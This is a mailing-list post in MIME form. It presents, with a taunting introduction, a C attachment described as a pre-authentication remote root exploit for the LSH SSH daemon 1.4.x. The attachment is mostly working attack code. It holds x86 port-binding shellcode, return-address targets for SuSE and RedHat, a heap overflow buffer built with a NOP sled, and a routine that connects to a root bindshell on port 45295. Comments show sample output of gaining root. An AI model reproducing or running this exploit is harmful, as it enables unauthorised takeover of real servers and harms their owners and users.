--Boundary-00=_k4va/VfuVk4+DdH
Content-Type: text/plain;
  charset="us-ascii"
Content-Transfer-Encoding: 7bit
Content-Disposition: inline


After reading about a theoretical remote hole in OpenSSH and many detractors 
smugly saying that they weren't vulnerable because they run LSH (a free 
alternative), I'd like to present a working remote root exploit against LSH 
version 1.4.x.

Enjoy.

--Boundary-00=_k4va/VfuVk4+DdH
Content-Type: text/x-csrc;
  charset="us-ascii";
  name="lsh_exploit.c"
Content-Transfer-Encoding: 7bit
Content-Disposition: attachment; filename="lsh_exploit.c"

/*
  Rough and ready exploit for lsh 1.4.x (other versions ?)
  by Haggis aka Carl Livitt - carl.learningshophull@co@uk

  Spawns bindshell on port 45295 of remote host.

  I suspect the overflow that this exploits is actually part
  of the liboop library that lsh uses... I haven't even looked.
  I just wanted to get this out the door to stop all the lsh
  lovers crooning about how they weren't getting 0wn3d like
  the openssh users might be.

  Yes, this 0day is real. Yes, it's pre-authentication.

  Handily, it also bypasses non-exec stack protection as the
  shellcode is on the heap.

  NOTE: This 0day public exploit _only_ works if it's the first
  thing to connect to the lshd daemon after it has been started.
  Any other time, it is just a DoS. Run it a few times against
  a host running lshd to see what I mean.

  Greets to B-r00t, kraft, marshal-l, ruxor, force5 and everyone
  else on #cheese at doris.scriptkiddie.net.

  ----

  haggis@sol:~/exploits/research/lsh/lsh-1.4.2/src> netcat localhost 22
  SSH-2.0-lshd_1.4.1 lsh - a free ssh
  
  haggis@sol:~/exploits/research/lsh/lsh-1.4.2/src> ./lsh_exploit -t localhost
  LSH 1.4.x (others?) exploit by Haggis (haggis@haggis.kicks-ass.net)

  [-] Building exploit buffer...
  [-] Sending exploit string...
  [-] Sleeping...
  [-] Connecting to bindshell...
  [-] Success!!! You should now be r00t on localhost
  id
  uid=0(root) gid=0(root) groups=0(root)

  ----
*/

#include <sys/types.h>
#include <sys/stat.h>
#include <sys/socket.h>
#include <net/if.h>
#include <netinet/in.h>
#include <netinet/tcp.h>
#include <arpa/inet.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <signal.h>
#include <netdb.h>
#include <time.h>
#include <stdarg.h>

#define SSH_PORT 22
#define SIZ 8096
#define EXPLOIT_BUF_SIZE 1536		// just approximate - works well enough
#define NOPS_LEN 1600

// So I ripped this from one of my previous exploits for speed...
//
// The following shellcode had 0x3f (?) chars in it which
// cause termination of our HTTP GET before the whole
// shellcode is written to the stack. The 0x3f's are
// needed because they are the dup2() syscall numbers. So,
// I've changed them to 0x3e's and INC'd them before doing
// an INT 0x80. Other than that, this shellcode is eSDee's.
// --------
// linux x86 shellcode by eSDee of Netric (www.netric.org)
// 200 byte - forking portbind shellcode - port=0xb0ef(45295)
char shellcode[]=
"\x31\xc0\x31\xdb\x31\xc9\x51\xb1"
"\x06\x51\xb1\x01\x51\xb1\x02\x51"
"\x89\xe1\xb3\x01\xb0\x66\xcd\x80"
"\x89\xc1\x31\xc0\x31\xdb\x50\x50"
"\x50\x66\x68\xb0\xef\xb3\x02\x66"
"\x53\x89\xe2\xb3\x10\x53\xb3\x02"
"\x52\x51\x89\xca\x89\xe1\xb0\x66"
"\xcd\x80\x31\xdb\x39\xc3\x74\x05"
"\x31\xc0\x40\xcd\x80\x31\xc0\x50"
"\x52\x89\xe1\xb3\x04\xb0\x66\xcd"
"\x80\x89\xd7\x31\xc0\x31\xdb\x31"
"\xc9\xb3\x11\xb1\x01\xb0\x30\xcd"
"\x80\x31\xc0\x31\xdb\x50\x50\x57"
"\x89\xe1\xb3\x05\xb0\x66\xcd\x80"
"\x89\xc6\x31\xc0\x31\xdb\xb0\x02"
"\xcd\x80\x39\xc3\x75\x40\x31\xc0"
"\x89\xfb\xb0\x06\xcd\x80\x31\xc0"
"\x31\xc9\x89\xf3\xb0\x3e\xfe\xc0\xcd\x80"
"\x31\xc0\x41\xb0\x3e\xfe\xc0\xcd\x80\x31"
"\xc0\x41\xb0\x3e\xfe\xc0\xcd\x80\x31\xc0"
"\x50\x68\x2f\x2f\x73\x68\x68\x2f"
"\x62\x69\x6e\x89\xe3\x8b\x54\x24"
"\x08\x50\x53\x89\xe1\xb0\x0b\xcd"
"\x80\x31\xc0\x40\xcd\x80\x31\xc0"
"\x89\xf3\xb0\x06\xcd\x80\xeb\x99";

struct
{
	char *platform;
	unsigned long retAddr;
}


targets[]=
{
	{ "SuSE 8.1 - LSH v1.4.x (default)", 0x0809f030},
	{ "RedHat 7.3 - LSH v1.4.x", 0x0809d620},
	NULL
};

void my_send(int, char *, ...);
void my_recv(int);
int connect_to_host(int);
void my_sleep(int n);
int do_bind_shell();

struct hostent *hostStruct;
char buf[SIZ], host[SIZ]="\0";
int useTarget=0;

// yeah yeah, i could enumerate the targets from the
// struct above. Whatever.
char usage[]=
"Usage: ./lsh_exploit -t <host> [-T host_type]\n\n"
"Available types are:\n"
"     0. SuSE 8.1 / LSH 1.4.x (default)\n"
"     1. RedHat 7.3 / LSH 1.4.x\n\n";

main(int argc, char **argv)
{
	int ch, i, targetSock;
	unsigned long *retPtr;
	char *charRetPtr;

	printf("LSH 1.4.x (others?) exploit by Haggis (haggis@haggis.kicks-ass.net)\n\n");
	while((ch=getopt(argc, argv, "t:T:h"))!=-1) {
		switch(ch) {
			case 't':
				strncpy(host, optarg, SIZ-1);
				break;
			case 'T':
				useTarget=atoi(optarg);
				break;
			case 'h':
			default:
				printf("%s\n",usage);
				printf("Available platforms:\n");
				for(i=0;targets[i].platform;i++)
					printf("%2d. %s\n", i, targets[i].platform);
				printf("\n");
				exit(0);
				break;
		}
	}

	if(host[0]=='\0') {
		printf("[*] You must specify a host!\n");
		exit(1);
	}
	if((hostStruct=gethostbyname(host))==NULL) {
		printf("[*] Couldn't resolve host %s\nUse '%s -h' for help\n", host,argv[0]);
		exit(1);
	}

	if((targetSock=connect_to_host(SSH_PORT))==-1) {
		printf("[*] Couln't connect to host %s\n", host);
		exit(1);
	}

// check port 45295 just incase we've already successfuly exploited this host
	if(do_bind_shell()==1) {
		exit(0);
	}
	printf("[-] Building exploit buffer...\n");
	my_recv(targetSock);
	retPtr=(unsigned long *)buf;
	for(i=0;i<EXPLOIT_BUF_SIZE/4;i++)
		*(retPtr++)=targets[useTarget].retAddr;
	for(i=0;i<NOPS_LEN/4;i++)
		*(retPtr++)=(unsigned long)0x90909090;
	charRetPtr=(unsigned char *)retPtr;
	memcpy(charRetPtr, shellcode, strlen(shellcode));
	*(charRetPtr+strlen(shellcode))='\n';
	*(charRetPtr+strlen(shellcode)+1)='\0';
	printf("[-] Sending exploit string...\n");
	my_send(targetSock, buf);
	close(targetSock);
	printf("[-] Sleeping...\n");
	my_sleep(100000);
	printf("[-] Connecting to bindshell...\n");
	if(do_bind_shell()==-1)
		printf("[*] Could not connect to %s - the exploit failed\n", host);
	exit(0);
}


int do_bind_shell()
{
	fd_set rfds;
	int sock,retVal,r;

	if((sock=connect_to_host(45295))==-1)
		return -1;

	printf("[-] Success!!! You should now be r00t on %s\n", host);
	do {
		FD_ZERO(&rfds);
		FD_SET(0, &rfds);
		FD_SET(sock, &rfds);
		retVal=select(sock+1, &rfds, NULL, NULL, NULL);
		if(retVal) {
			if(FD_ISSET(sock, &rfds)) {
												  // bad!
				buf[(r=recv(sock, buf, SIZ-1,0))]='\0';
				printf("%s", buf);
			}
			if(FD_ISSET(0, &rfds)) {
				buf[(r=read(0, buf, SIZ-1))]='\0';// bad!
				send(sock, buf, strlen(buf), 0);
			}

		}
	} while(retVal && r);						  // loop until connection terminates

	close(sock);
	return 1;
}


// Given a port number, connects to an already resolved hostname...
// connects a TCP stream and returns a socket number (or returns error)
int connect_to_host(int p)
{
	int sock;
	struct sockaddr_in saddr;

	if((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==-1)
		return -1;
	memset((void *)&saddr, 0, sizeof(struct sockaddr_in));
	saddr.sin_family=AF_INET;
	saddr.sin_addr.s_addr=*((unsigned long *)hostStruct->h_addr_list[0]);
	saddr.sin_port=htons(p);
	if(connect(sock, (struct sockaddr *)&saddr, sizeof(saddr))<0) {
		close(sock);
		return -1;
	} else
	return sock;
}


// Handy little function to send formattable data down a socket.
void my_send(int s, char *b, ...)
{
	va_list ap;
	char *buf;

	va_start(ap,b);
	vasprintf(&buf,b,ap);
	send(s,buf,strlen(buf),0);
	va_end(ap);
	free(buf);
}


// Another handy function to read data from a socket.
void my_recv(int s)
{
	int len;
	char buf[SIZ];

	len=recv(s, buf, SIZ-1, 0);
	buf[len]=0;
}


// Wrapper for nanosleep()... just pass 'n' nanoseconds to it.
void my_sleep(int n)
{
	struct timespec t;
	t.tv_sec=0;
	t.tv_nsec=n;
	nanosleep(&t,&t);
}

--Boundary-00=_k4va/VfuVk4+DdH--